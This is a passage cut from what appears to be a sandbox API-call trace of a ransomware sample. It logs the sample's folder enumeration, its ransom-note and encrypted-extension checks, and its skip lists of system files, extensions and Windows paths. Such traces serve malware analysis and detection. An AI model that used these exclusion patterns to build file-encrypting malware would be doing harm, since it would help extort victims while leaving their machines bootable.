y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc" [0074.780] SetEvent (hEvent=0x3fc) returned 1 [0074.780] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552ec38 | out: lpFindFileData=0x552ec38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f46e60, ftCreationTime.dwHighDateTime=0x1d5e102, ftLastAccessTime.dwLowDateTime=0xe5bb2500, ftLastAccessTime.dwHighDateTime=0x1d5eff9, ftLastWriteTime.dwLowDateTime=0xe5bb2500, ftLastWriteTime.dwHighDateTime=0x1d5eff9, nFileSizeHigh=0x0, nFileSizeLow=0x182b4, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="RcZvqUQNfrhT.rtf", cAlternateFileName="RCZVQU~1.RTF")) returned 1 [0074.780] StrCmpW (psz1="RcZvqUQNfrhT.rtf", psz2=".") returned 1 [0074.780] StrCmpW (psz1="RcZvqUQNfrhT.rtf", psz2="..") returned 1 [0074.780] StrCpyNW (in: psz1=0xed5bd8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0074.780] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0074.780] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="RcZvqUQNfrhT.rtf", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf" [0074.780] PathFindExtensionW (pszPath="RcZvqUQNfrhT.rtf") returned=".rtf" [0074.780] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0074.780] StrCmpIW (psz1="RcZvqUQNfrhT.rtf", psz2="bootsect.bak") returned 1 [0074.780] StrCmpIW (psz1="RcZvqUQNfrhT.rtf", psz2="iconcache.db") returned 1 [0074.781] StrCmpIW (psz1="RcZvqUQNfrhT.rtf", psz2="thumbs.db") returned -1 [0074.781] StrCmpIW (psz1="RcZvqUQNfrhT.rtf", psz2=" ransomware ") returned 1 [0074.781] StrCmpIW (psz1="RcZvqUQNfrhT.rtf", psz2=" ransom ") returned 1 [0074.781] StrCmpIW (psz1="RcZvqUQNfrhT.rtf", psz2="debug.txt") returned 1 [0074.781] StrCmpIW (psz1="RcZvqUQNfrhT.rtf", psz2="boot.ini") returned 1 [0074.781] StrCmpIW (psz1="RcZvqUQNfrhT.rtf", psz2="desktop.ini") returned 1 [0074.781] StrCmpIW (psz1="RcZvqUQNfrhT.rtf", psz2="autorun.inf") returned 1 [0074.781] StrCmpIW (psz1="RcZvqUQNfrhT.rtf", psz2="ntuser.dat") returned 1 [0074.781] StrCmpIW (psz1="RcZvqUQNfrhT.rtf", psz2="ntldr") returned 1 [0074.781] StrCmpIW (psz1="RcZvqUQNfrhT.rtf", psz2="ntdetect.com") returned 1 [0074.781] StrCmpIW (psz1="RcZvqUQNfrhT.rtf", psz2="bootfont.bin") returned 1 [0074.781] StrCmpIW (psz1="RcZvqUQNfrhT.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.781] PathFindExtensionW (pszPath="RcZvqUQNfrhT.rtf") returned=".rtf" [0074.781] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0074.781] FileTimeToSystemTime (in: lpFileTime=0x552ec3c, lpSystemTime=0x552ec28 | out: lpSystemTime=0x552ec28) returned 1 [0074.781] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552ec28, lpLocalTime=0x552ebf8 | out: lpLocalTime=0x552ebf8) returned 1 [0074.781] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.789] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.790] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf" [0074.790] SetEvent (hEvent=0x3fc) returned 1 [0074.790] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552ec38 | out: lpFindFileData=0x552ec38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f6cca00, ftCreationTime.dwHighDateTime=0x1d5e63f, ftLastAccessTime.dwLowDateTime=0x600cb1a0, ftLastAccessTime.dwHighDateTime=0x1d5e51b, ftLastWriteTime.dwLowDateTime=0x600cb1a0, ftLastWriteTime.dwHighDateTime=0x1d5e51b, nFileSizeHigh=0x0, nFileSizeLow=0x13d1b, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="tPNskvgoa.ots", cAlternateFileName="TPNSKV~1.OTS")) returned 1 [0074.790] StrCmpW (psz1="tPNskvgoa.ots", psz2=".") returned 1 [0074.790] StrCmpW (psz1="tPNskvgoa.ots", psz2="..") returned 1 [0074.790] StrCpyNW (in: psz1=0xed5bd8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0074.790] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0074.790] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="tPNskvgoa.ots", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots" [0074.790] PathFindExtensionW (pszPath="tPNskvgoa.ots") returned=".ots" [0074.790] StrCmpW (psz1=".ots", psz2=".txd0t") returned -1 [0074.790] StrCmpIW (psz1="tPNskvgoa.ots", psz2="bootsect.bak") returned 1 [0074.790] StrCmpIW (psz1="tPNskvgoa.ots", psz2="iconcache.db") returned 1 [0074.790] StrCmpIW (psz1="tPNskvgoa.ots", psz2="thumbs.db") returned 1 [0074.790] StrCmpIW (psz1="tPNskvgoa.ots", psz2=" ransomware ") returned 1 [0074.790] StrCmpIW (psz1="tPNskvgoa.ots", psz2=" ransom ") returned 1 [0074.790] StrCmpIW (psz1="tPNskvgoa.ots", psz2="debug.txt") returned 1 [0074.790] StrCmpIW (psz1="tPNskvgoa.ots", psz2="boot.ini") returned 1 [0074.790] StrCmpIW (psz1="tPNskvgoa.ots", psz2="desktop.ini") returned 1 [0074.790] StrCmpIW (psz1="tPNskvgoa.ots", psz2="autorun.inf") returned 1 [0074.790] StrCmpIW (psz1="tPNskvgoa.ots", psz2="ntuser.dat") returned 1 [0074.790] StrCmpIW (psz1="tPNskvgoa.ots", psz2="ntldr") returned 1 [0074.790] StrCmpIW (psz1="tPNskvgoa.ots", psz2="ntdetect.com") returned 1 [0074.790] StrCmpIW (psz1="tPNskvgoa.ots", psz2="bootfont.bin") returned 1 [0074.790] StrCmpIW (psz1="tPNskvgoa.ots", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.790] PathFindExtensionW (pszPath="tPNskvgoa.ots") returned=".ots" [0074.790] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ots") returned 0x0 [0074.790] FileTimeToSystemTime (in: lpFileTime=0x552ec3c, lpSystemTime=0x552ec28 | out: lpSystemTime=0x552ec28) returned 1 [0074.790] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552ec28, lpLocalTime=0x552ebf8 | out: lpLocalTime=0x552ebf8) returned 1 [0074.790] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.800] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.800] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots" [0074.800] SetEvent (hEvent=0x3fc) returned 1 [0074.800] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552ec38 | out: lpFindFileData=0x552ec38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70d732c0, ftCreationTime.dwHighDateTime=0x1d5ec83, ftLastAccessTime.dwLowDateTime=0xed8ee220, ftLastAccessTime.dwHighDateTime=0x1d5e974, ftLastWriteTime.dwLowDateTime=0xed8ee220, ftLastWriteTime.dwHighDateTime=0x1d5e974, nFileSizeHigh=0x0, nFileSizeLow=0xcdaa, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="tYF1BO7xWTgAbs uk76.csv", cAlternateFileName="TYF1BO~1.CSV")) returned 1 [0074.800] StrCmpW (psz1="tYF1BO7xWTgAbs uk76.csv", psz2=".") returned 1 [0074.800] StrCmpW (psz1="tYF1BO7xWTgAbs uk76.csv", psz2="..") returned 1 [0074.800] StrCpyNW (in: psz1=0xed5bd8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0074.800] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0074.800] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="tYF1BO7xWTgAbs uk76.csv", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv" [0074.800] PathFindExtensionW (pszPath="tYF1BO7xWTgAbs uk76.csv") returned=".csv" [0074.800] StrCmpW (psz1=".csv", psz2=".txd0t") returned -1 [0074.800] StrCmpIW (psz1="tYF1BO7xWTgAbs uk76.csv", psz2="bootsect.bak") returned 1 [0074.800] StrCmpIW (psz1="tYF1BO7xWTgAbs uk76.csv", psz2="iconcache.db") returned 1 [0074.800] StrCmpIW (psz1="tYF1BO7xWTgAbs uk76.csv", psz2="thumbs.db") returned 1 [0074.800] StrCmpIW (psz1="tYF1BO7xWTgAbs uk76.csv", psz2=" ransomware ") returned 1 [0074.800] StrCmpIW (psz1="tYF1BO7xWTgAbs uk76.csv", psz2=" ransom ") returned 1 [0074.800] StrCmpIW (psz1="tYF1BO7xWTgAbs uk76.csv", psz2="debug.txt") returned 1 [0074.800] StrCmpIW (psz1="tYF1BO7xWTgAbs uk76.csv", psz2="boot.ini") returned 1 [0074.800] StrCmpIW (psz1="tYF1BO7xWTgAbs uk76.csv", psz2="desktop.ini") returned 1 [0074.800] StrCmpIW (psz1="tYF1BO7xWTgAbs uk76.csv", psz2="autorun.inf") returned 1 [0074.800] StrCmpIW (psz1="tYF1BO7xWTgAbs uk76.csv", psz2="ntuser.dat") returned 1 [0074.800] StrCmpIW (psz1="tYF1BO7xWTgAbs uk76.csv", psz2="ntldr") returned 1 [0074.800] StrCmpIW (psz1="tYF1BO7xWTgAbs uk76.csv", psz2="ntdetect.com") returned 1 [0074.800] StrCmpIW (psz1="tYF1BO7xWTgAbs uk76.csv", psz2="bootfont.bin") returned 1 [0074.800] StrCmpIW (psz1="tYF1BO7xWTgAbs uk76.csv", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.801] PathFindExtensionW (pszPath="tYF1BO7xWTgAbs uk76.csv") returned=".csv" [0074.801] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".csv") returned 0x0 [0074.801] FileTimeToSystemTime (in: lpFileTime=0x552ec3c, lpSystemTime=0x552ec28 | out: lpSystemTime=0x552ec28) returned 1 [0074.801] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552ec28, lpLocalTime=0x552ebf8 | out: lpLocalTime=0x552ebf8) returned 1 [0074.801] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.813] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.813] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv" [0074.813] SetEvent (hEvent=0x3fc) returned 1 [0074.813] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552ec38 | out: lpFindFileData=0x552ec38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fd487f0, ftCreationTime.dwHighDateTime=0x1d5e930, ftLastAccessTime.dwLowDateTime=0x54780280, ftLastAccessTime.dwHighDateTime=0x1d5ed2d, ftLastWriteTime.dwLowDateTime=0x54780280, ftLastWriteTime.dwHighDateTime=0x1d5ed2d, nFileSizeHigh=0x0, nFileSizeLow=0xb28a, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="vTQY5QAfnqPKv2th.odt", cAlternateFileName="VTQY5Q~1.ODT")) returned 1 [0074.813] StrCmpW (psz1="vTQY5QAfnqPKv2th.odt", psz2=".") returned 1 [0074.813] StrCmpW (psz1="vTQY5QAfnqPKv2th.odt", psz2="..") returned 1 [0074.813] StrCpyNW (in: psz1=0xed5bd8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0074.813] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0074.813] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="vTQY5QAfnqPKv2th.odt", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt" [0074.813] PathFindExtensionW (pszPath="vTQY5QAfnqPKv2th.odt") returned=".odt" [0074.813] StrCmpW (psz1=".odt", psz2=".txd0t") returned -1 [0074.813] StrCmpIW (psz1="vTQY5QAfnqPKv2th.odt", psz2="bootsect.bak") returned 1 [0074.813] StrCmpIW (psz1="vTQY5QAfnqPKv2th.odt", psz2="iconcache.db") returned 1 [0074.814] StrCmpIW (psz1="vTQY5QAfnqPKv2th.odt", psz2="thumbs.db") returned 1 [0074.814] StrCmpIW (psz1="vTQY5QAfnqPKv2th.odt", psz2=" ransomware ") returned 1 [0074.814] StrCmpIW (psz1="vTQY5QAfnqPKv2th.odt", psz2=" ransom ") returned 1 [0074.814] StrCmpIW (psz1="vTQY5QAfnqPKv2th.odt", psz2="debug.txt") returned 1 [0074.814] StrCmpIW (psz1="vTQY5QAfnqPKv2th.odt", psz2="boot.ini") returned 1 [0074.814] StrCmpIW (psz1="vTQY5QAfnqPKv2th.odt", psz2="desktop.ini") returned 1 [0074.814] StrCmpIW (psz1="vTQY5QAfnqPKv2th.odt", psz2="autorun.inf") returned 1 [0074.814] StrCmpIW (psz1="vTQY5QAfnqPKv2th.odt", psz2="ntuser.dat") returned 1 [0074.814] StrCmpIW (psz1="vTQY5QAfnqPKv2th.odt", psz2="ntldr") returned 1 [0074.814] StrCmpIW (psz1="vTQY5QAfnqPKv2th.odt", psz2="ntdetect.com") returned 1 [0074.814] StrCmpIW (psz1="vTQY5QAfnqPKv2th.odt", psz2="bootfont.bin") returned 1 [0074.814] StrCmpIW (psz1="vTQY5QAfnqPKv2th.odt", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.814] PathFindExtensionW (pszPath="vTQY5QAfnqPKv2th.odt") returned=".odt" [0074.814] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".odt") returned 0x0 [0074.814] FileTimeToSystemTime (in: lpFileTime=0x552ec3c, lpSystemTime=0x552ec28 | out: lpSystemTime=0x552ec28) returned 1 [0074.814] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552ec28, lpLocalTime=0x552ebf8 | out: lpLocalTime=0x552ebf8) returned 1 [0074.814] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.823] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.823] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt" [0074.823] SetEvent (hEvent=0x3fc) returned 1 [0074.823] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552ec38 | out: lpFindFileData=0x552ec38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fd487f0, ftCreationTime.dwHighDateTime=0x1d5e930, ftLastAccessTime.dwLowDateTime=0x54780280, ftLastAccessTime.dwHighDateTime=0x1d5ed2d, ftLastWriteTime.dwLowDateTime=0x54780280, ftLastWriteTime.dwHighDateTime=0x1d5ed2d, nFileSizeHigh=0x0, nFileSizeLow=0xb28a, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="vTQY5QAfnqPKv2th.odt", cAlternateFileName="VTQY5Q~1.ODT")) returned 0 [0074.823] FindClose (in: hFindFile=0xec2630 | out: hFindFile=0xec2630) returned 1 [0074.823] GetProcessHeap () returned 0xe30000 [0074.823] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed5bd8 | out: hHeap=0xe30000) returned 1 [0074.823] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x975770, ftCreationTime.dwHighDateTime=0x1d5e9ad, ftLastAccessTime.dwLowDateTime=0x3007e1f0, ftLastAccessTime.dwHighDateTime=0x1d5ec41, ftLastWriteTime.dwLowDateTime=0x3007e1f0, ftLastWriteTime.dwHighDateTime=0x1d5ec41, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="_HV0qcp0pks", cAlternateFileName="_HV0QC~1")) returned 0 [0074.823] FindClose (in: hFindFile=0xec25f0 | out: hFindFile=0xec25f0) returned 1 [0074.823] GetProcessHeap () returned 0xe30000 [0074.823] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed46d0 | out: hHeap=0xe30000) returned 1 [0074.823] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf966ba0, ftCreationTime.dwHighDateTime=0x1d5f04a, ftLastAccessTime.dwLowDateTime=0x2bd48c40, ftLastAccessTime.dwHighDateTime=0x1d5e611, ftLastWriteTime.dwLowDateTime=0x2bd48c40, ftLastWriteTime.dwHighDateTime=0x1d5e611, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="_L78DH7wK y2TBjiEU", cAlternateFileName="_L78DH~1")) returned 0 [0074.823] FindClose (in: hFindFile=0xec2770 | out: hFindFile=0xec2770) returned 1 [0074.823] GetProcessHeap () returned 0xe30000 [0074.823] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed31f0 | out: hHeap=0xe30000) returned 1 [0074.823] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b82510, ftCreationTime.dwHighDateTime=0x1d5ea83, ftLastAccessTime.dwLowDateTime=0x5dcdc200, ftLastAccessTime.dwHighDateTime=0x1d5e406, ftLastWriteTime.dwLowDateTime=0x5dcdc200, ftLastWriteTime.dwHighDateTime=0x1d5e406, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z5Oif6_Mr_Ui", cAlternateFileName="Z5OIF6~1")) returned 0 [0074.824] FindClose (in: hFindFile=0xec2730 | out: hFindFile=0xec2730) returned 1 [0074.824] GetProcessHeap () returned 0xe30000 [0074.824] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed0058 | out: hHeap=0xe30000) returned 1 [0074.824] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa2dc870b, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0xa2dc870b, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0074.824] StrCmpW (psz1="Downloads", psz2=".") returned 1 [0074.824] StrCmpW (psz1="Downloads", psz2="..") returned 1 [0074.824] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0074.824] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0074.824] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Downloads", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Downloads") returned="C:\\Users\\FD1HVy\\Downloads" [0074.824] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\windows\\system32\\") returned 0x0 [0074.824] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\windows\\syswow64\\") returned 0x0 [0074.824] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\windows\\system\\") returned 0x0 [0074.824] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\windows\\winsxs\\") returned 0x0 [0074.824] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\appdata\\roaming\\") returned 0x0 [0074.824] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\appdata\\local\\") returned 0x0 [0074.824] StrStrIW 